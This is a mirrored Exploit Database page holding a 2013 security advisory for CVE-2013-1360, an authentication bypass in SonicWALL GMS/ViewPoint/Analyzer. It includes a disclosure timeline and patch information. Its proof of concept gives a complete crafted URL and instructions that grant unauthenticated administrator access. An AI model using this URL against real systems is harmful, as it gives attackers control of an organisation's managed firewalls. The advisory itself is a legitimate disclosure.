SonicWALL GMS/Viewpoint/Analyzer – Authentication Bypass

• Exploit Database
• 113 阅读

• 作者： Nikolas Sotiriu
  日期： 2013-01-18
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/24203/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149

  -------------------------- NSOADV-2013-002 ---------------------------   SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) ______________________________________________________________________ ______________________________________________________________________   111101111 11111 00110 00110001111 111111 01 01 1 11111011111111 111110 11 01 0 11 1 1111011001 11111111101 1 11 011011111111101111 10010 1 10 11 0 10 11 11111111 111 111001 111111111 0 10 1111 0 11 11 111111111 1 1101 10 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11100 10111111 0 01 01 1 111110 11 111111111111111110000011 0111111110 0110 1110 1 0 11101111111111111011 1110000 01111 0 10 1110 1 011111 1 111111111111111111111101 01 01110 0 10 111110 110 0 11101111111111111111101111101 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 111110110 10 0111110 1 0 0 1111111111111111111111111 110 111 11111 11 111 1 10011 101111111111011111111 0 1100 111 10110 101011110010 11111111111111111111111 11 0011100 11 10 001100 0001111111111111111111 10 11 11110 11110 0010000001 10 11111101010001 11111111 1110101011 1000000100 1110000001101 0 0110 111011011 0110 10001101 11110 1011 1 10 101 00000101 00 1010 1110011 110110 1101010110 101 11110 110000011 111 ______________________________________________________________________ ______________________________________________________________________   Title:SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) Severity: Critical CVE-ID: CVE-2013-1360 CVSS Base Score:9 Impact:8.5 Exploitability:10 CVSS2 Vector:AV:N/AC:L/Au:N/C:P/I:P/A:C Advisory ID:NSOADV-2013-002 Found Date: 2012-04-26 Date Reported:2012-12-13 Release Date: 2013-01-17 Author: Nikolas Sotiriu Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2013-002.txt Vendor: DELL SonicWALL (http://www.sonicwall.com/) Affected Products:GMS Analyzer UMA ViewPoint Affected Platforms: Windows/Linux Affected Versions:GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x Remote Exploitable: Yes Local Exploitable:No Patch Status: Vendor released a patch (See Solution) Discovered by:Nikolas Sotiriu       Background: ===========   The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster configuration.   (Product description from Website)       Description: ============   DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that allows an unauthenticated, remote attacker to bypass the Web interface authentication offered by the affected product.   The vulnerability is attributed to a broken session handling in the process of password change process of the web application. changing in the web application.   An attacker may exploit this vulnerability by sending a specially crafted request to the SGMS Interface (/sgms/).   The attacker gains full administrative access to the interface and full control over all managed appliances, which could lead to a full compromisation of the organisation.       Proof of Concept : ==================   Access the following URL to login to the sgms interface:   http://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663 83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092 4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000 00000000001   If the Console is not directly shown, type any password you want in the change password dialog twice and hit submit to login.   Maybe you need to access the following URL after this process:   http://host/sgms/auth       Solution: =========   Install Hotfix 125076.77. (Download from www.mysonicwall.com)       Disclosure Timeline: ====================   2012-04-26: Vulnerability found 2012-12-12: Sent the notification and disclosure policy and asked for a PGP Key (security@sonicwall.com) 2012-12-13: Sent advisory, disclosure policy and planned disclosure date (2012-12-28) to vendor 2012-12-18: SonicWALL analyzed the finding and wishes to delay the release to the 3. calendar week 2013. 2012-12-18: Changed release date to 2013-01-17. 2012-12-20: Patch is published 2013-01-17: Release of this advisory